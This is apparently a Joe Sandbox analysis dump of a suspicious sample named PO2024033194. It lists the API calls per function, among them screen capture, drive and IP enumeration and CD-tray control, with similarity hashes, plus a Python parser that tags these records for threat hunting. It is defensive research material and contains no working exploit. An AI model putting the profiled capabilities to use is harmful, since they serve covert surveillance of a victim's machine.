• Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
• Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00461678
• _wcslen.LIBCMT ref: 00461683
• __swprintf.LIBCMT ref: 00461721
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
• GetClassNameW.USER32(?,?,00000400), ref: 00461811
• GetDlgCtrlID.USER32(?), ref: 00461869
• GetWindowRect.USER32(?,?), ref: 004618A4
• GetParent.USER32(?), ref: 004618C3
• ScreenToClient.USER32(00000000), ref: 004618CA
• GetClassNameW.USER32(?,?,00000100), ref: 00461941
• GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
• Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
• Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: InfoItemMenu$Sleep
• String ID: 0
• API String ID: 1196289194-4108050209
• Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
• Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
• Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
• Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
• Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
• Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
• Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
• Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1976180769-4113822522
• Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
• Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
• Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
• Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                  • String ID:
                                                                  • API String ID: 461458858-0
                                                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                  • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                  • DeleteObject.GDI32(?), ref: 004301D0
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3969911579-0
                                                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                  • String ID: 0
                                                                  • API String ID: 956284711-4108050209
                                                                  • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                  • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                  • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                  • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 1965227024-3771769585
                                                                  • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                  • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$_memmove_wcslen
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 369157077-1007645807
                                                                  • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                  • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                  • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                  • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                  APIs
                                                                  • GetParent.USER32 ref: 00445BF8
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                  • __wcsicoll.LIBCMT ref: 00445C33
                                                                  • __wcsicoll.LIBCMT ref: 00445C4F
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 3125838495-3381328864
                                                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                  APIs
                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CharNext
                                                                  • String ID:
                                                                  • API String ID: 1350042424-0
                                                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                  APIs
                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                  • _wcscpy.LIBCMT ref: 004787E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 3052893215-2127371420
                                                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
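The records above are the raw per-function dumps behind this report: an APIs block of resolved calls with their code references (calls made inside a subcall are indented and attributed to the callee), then Similarity fields whose API ID / String ID pair, Opcode ID and fuzzy hashes are what a hunter pivots on when matching a routine across samples. As an added example that is not part of this report or of Joe Sandbox, the following Python parses that text layout back into structured records and tags each routine from the API names and strings visible on this page. The behaviour labels in BEHAVIOUR_RULES are this example's own assumptions, not Joe Sandbox signatures; the two embedded records are copied from this page with their Memory Dump Source lines left out.

```python
"""Parse Joe Sandbox per-function "APIs / Similarity" records (the text dump
layout on this page) and tag each routine with a coarse behaviour label plus
the fields a hunter pivots on.  Added example, not Joe Sandbox code; the
BEHAVIOUR_RULES labels are this example's own assumptions drawn from API names
and strings visible in the report, not Joe Sandbox signatures."""
import re
from dataclasses import dataclass, field
from typing import Optional

BULLET = "\u2022"  # the bullet character the report uses
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Matches both "GetDriveTypeW.KERNEL32(?), ref: 004787B9" and "_wcscpy.LIBCMT ref: 004787E5".
API_RE = re.compile(r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<func>[0-9A-Fa-f]{8}):")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # callee address when the call sits in a subcall


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # the "String ID" field, "$"-separated
    similarity: dict = field(default_factory=dict)

    def api_blob(self):
        # Direct call names plus "API ID", which also names APIs the report only
        # attributes to subcalls without listing them as bullets (substring matching).
        return " ".join(c.name for c in self.calls) + " " + self.similarity.get("API ID", "")


def parse_records(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every record opens with its APIs block
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith(BULLET):
            body = line[len(BULLET):].strip()
            if section == "APIs" and (m := API_RE.search(body)):
                sub = SUBCALL_RE.match(body)
                args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
                current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(),
                                             sub["func"] if sub else None))
            elif section == "Similarity":
                key, _, value = body.partition(":")
                current.similarity[key.strip()] = value.strip()
                if key.strip() == "String ID" and value.strip():
                    current.strings = value.strip().split("$")
    return records


# (label, API-name needles that must all appear, optional string needle): assumptions
BEHAVIOUR_RULES = [
    ("local_ip_enumeration", ("gethostname", "gethostbyname", "inet_ntoa"), None),
    ("drive_type_enumeration", ("GetDriveTypeW",), "fixed"),
    ("cd_tray_control", ("mciSendStringW",), "set cd door"),
    ("explorer_view_control", ("GetClassNameW", "SendMessageW"), "SHELLDLL_DefView"),
]


def tag_record(rec):
    blob, joined = rec.api_blob(), "$".join(rec.strings)
    return [label for label, needles, s in BEHAVIOUR_RULES
            if all(n in blob for n in needles) and (s is None or s in joined)]


def summarize(text):
    """One hunting-ready dict per routine: call sequence, tags and pivot fields."""
    return [{"apis": [f"{c.module}!{c.name}" for c in r.calls],
             "strings": r.strings, "tags": tag_record(r),
             "api_string_id": r.similarity.get("API String ID"),
             "instruction_fuzzy_hash": r.similarity.get("Instruction Fuzzy Hash")}
            for r in parse_records(text)]


# Two records copied from this report (Memory Dump Source lines omitted).
SAMPLE = """\
APIs
Strings
Similarity
• API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 1965227024-3771769585
• Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32(?), ref: 004787B9
• _wcscpy.LIBCMT ref: 004787E5
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: \\VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 3052893215-2127371420
• Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
"""
```

summarize(SAMPLE) yields one dict per routine; the first record carries no call bullets at all (its WinSock calls surface only in the API ID field), which is why tagging matches on the combined API ID text rather than on listed calls alone. The Instruction Fuzzy Hash and API String ID values are kept verbatim so they can be searched for in other reports of the same family.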
                                                                  APIs
